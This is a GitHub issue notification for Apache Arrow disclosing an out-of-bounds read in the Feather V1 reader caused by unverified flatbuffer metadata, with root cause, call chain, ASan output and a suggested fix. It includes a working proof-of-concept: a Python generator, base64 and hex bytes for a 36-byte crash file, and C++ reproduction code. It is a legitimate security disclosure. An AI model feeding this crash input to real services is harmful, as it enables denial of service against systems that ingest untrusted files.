OwenSanzas opened a new issue, #50229:
URL: https://github.com/apache/arrow/issues/50229
## Summary
Opening a crafted Feather **V1** file through the public
`arrow::ipc::feather::Reader::Open` API triggers an AddressSanitizer
heap-buffer-overflow (out-of-bounds read) inside Arrow's legacy Feather V1
metadata parsing. The reader calls `fbs::GetCTable` on the trailing metadata
flatbuffer **without first running a `flatbuffers::Verifier`**, then
dereferences attacker-controlled offsets in `ReaderV1::ReadSchema`
(`cpp/src/arrow/ipc/feather.cc:178`) before any `Status` error can be
returned.
A 36-byte file with the `FEA1` magic and a corrupt footer triggers the crash
deterministically, so any service that ingests untrusted Feather V1 files
can be
crashed (denial of service).
Tested at pinned commit `16fe34250a2ef261790b9cc414fdf0831669cf9f`
(25.0.0-SNAPSHOT).
## Root Cause
`ReaderV1::Open` reads the trailing metadata flatbuffer and obtains a typed
view
of it via `fbs::GetCTable(...)`. A flatbuffer obtained this way is
**untrusted**:
its vtable, field offsets, and vector lengths are attacker-controlled bytes.
The
flatbuffers contract requires a caller to run a `flatbuffers::Verifier` over
the
buffer before touching any generated accessor; only verification guarantees
that
every offset stays inside the buffer.
`ReaderV1::Open` skips that step. It goes straight from `GetCTable` to
`ReadSchema()`, which dereferences `metadata_->columns()` on the unverified
table. `columns()` is a flatbuffers `GetPointer` that reads the vtable and an
offset field; with a corrupt offset, `flatbuffers::ReadScalar` reads past
the end
of the metadata buffer.
Vulnerable code (`cpp/src/arrow/ipc/feather.cc:172`):
```cpp
metadata_ = fbs::GetCTable(metadata_buffer_->data()); // no
flatbuffers::Verifier
return ReadSchema();
}
Status ReadSchema() {
std::vector<std::shared_ptr<Field>> fields;
for (int i = 0; i < static_cast<int>(metadata_->columns()->size()); ++i)
{ // line 178: deref unverified flatbuffer
const fbs::Column* col = metadata_->columns()->Get(i);
std::shared_ptr<DataType> type;
RETURN_NOT_OK(
GetDataType(col->values(), col->metadata_type(), col->metadata(),
&type));
fields.push_back(::arrow::field(col->name()->str(), type));
}
```
Call chain (attacker bytes -> fault):
```
arrow::ipc::feather::Reader::Open feather.cc:773 / :794 (public
API)
-> ReaderV1::Open feather.cc:173
metadata_ = fbs::GetCTable(...) feather.cc:172 <- NO
flatbuffers::Verifier
-> ReaderV1::ReadSchema feather.cc:178
metadata_->columns()->size() -> fbs::CTable::columns()
feather_generated.h:698
-> flatbuffers::Table::GetVTable
-> flatbuffers::ReadScalar base.h:440 <- OOB read
```
The metadata buffer is sized to the file's declared `metadata_length`; the
corrupt offset points past that region, so the accessor reads out of bounds.
Arrow's own threat model (`docs/source/cpp/security.rst`, "Ingesting
untrusted
data") states the IPC reader APIs must return an `arrow::Status` error on
malformed input. The V1 reader violates that contract: it crashes before it
can
return a `Status`.
## PoC
A 36-byte malformed Feather V1 file: the `FEA1` magic header, padding, a
`metadata_length` of 0, and the trailing `FEA1` magic. `Reader::Open` selects
the legacy V1 path on the `FEA1` magic, then `GetCTable` builds a table over
an
empty/short metadata region and `columns()` reads out of bounds.
```python
# generate_poc.py — re-create the shipped 36-byte crash input
poc = (b"FEA1" # leading magic
+ b"\xff" * 24 # corrupt footer body
+ b"\x00\x00\x00\x00" # metadata_length = 0
+ b"FEA1") # trailing magic
open("poc.bin", "wb").write(poc)
assert len(poc) == 36
```
Crash input size: 36 bytes (`poc/poc.bin`, md5
`9d96bcc065b6672396fed18492792d03`).
## Reproduction
Build Arrow C++ from source with `-DARROW_IPC=ON` and AddressSanitizer, then
open the attached Feather
V1 file through the public reader API:
```cpp
#include <arrow/ipc/feather.h>
#include <arrow/io/memory.h>
// auto buf = ...read poc.bin...;
auto source = std::make_shared<arrow::io::BufferReader>(buf);
std::shared_ptr<arrow::ipc::feather::Reader> reader;
auto st = arrow::ipc::feather::Reader::Open(source).Value(&reader); // OOB
read here
```
`ReaderV1::Open` does `metadata_ = fbs::GetCTable(metadata_buffer_->data())`
with **no
`flatbuffers::Verifier`** over the metadata, then `ReadSchema()`
dereferences `metadata_->columns()` on
the unverified flatbuffer:
```
AddressSanitizer: heap-buffer-overflow READ
#0 flatbuffers::ReadScalar<...> base.h
#1 arrow::ipc::feather::fbs::CTable::columns() feather_generated.h
#2 ReaderV1::ReadSchema / ReaderV1::Open ipc/feather.cc
```
The unverified `GetCTable` + `columns()` deref is still present in current
`master` (`cpp/src/arrow/ipc/feather.cc:172`).
PoC: 36-byte `.feather` file (recreate from the base64 below).
## Suggested Fix
Run a `flatbuffers::Verifier` over the metadata buffer before calling
`fbs::GetCTable` / dereferencing any accessor, returning `Status::Invalid` on
failure — matching how the V2/IPC reader rejects malformed metadata:
```diff
ARROW_ASSIGN_OR_RAISE(metadata_buffer_,
source->ReadAt(size - footer_size - metadata_length,
metadata_length,
/*allow_short_read=*/false));
- metadata_ = fbs::GetCTable(metadata_buffer_->data());
+ flatbuffers::Verifier verifier(metadata_buffer_->data(),
+ metadata_buffer_->size());
+ if (!fbs::VerifyCTableBuffer(verifier)) {
+ return Status::Invalid("Feather V1 metadata failed flatbuffer
verification");
+ }
+ metadata_ = fbs::GetCTable(metadata_buffer_->data());
return ReadSchema();
```
(The exact verifier symbol depends on the generated `feather_generated.h`;
the
principle is "verify before accessing", and the precise call is the upstream
maintainer's judgement.)
## PoC bytes (self-contained)
The trigger input is **36 bytes** (`poc/poc.bin`).
Recreate it exactly with:
```bash
base64 -d > poc.bin <<'B64'
RkVBMf///////////////////////////////wAAAABGRUEx
B64
```
Hex:
`46454131ffffffffffffffffffffffffffffffffffffffffffffffff0000000046454131`
## Credit
Aisle Research (Ze Sheng (O2Lab & TAMU), Dmitrijs Trizna, Luigino Camastra,
Guido Vranken).
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: [email protected]
For queries about this service, please contact Infrastructure at:
[email protected]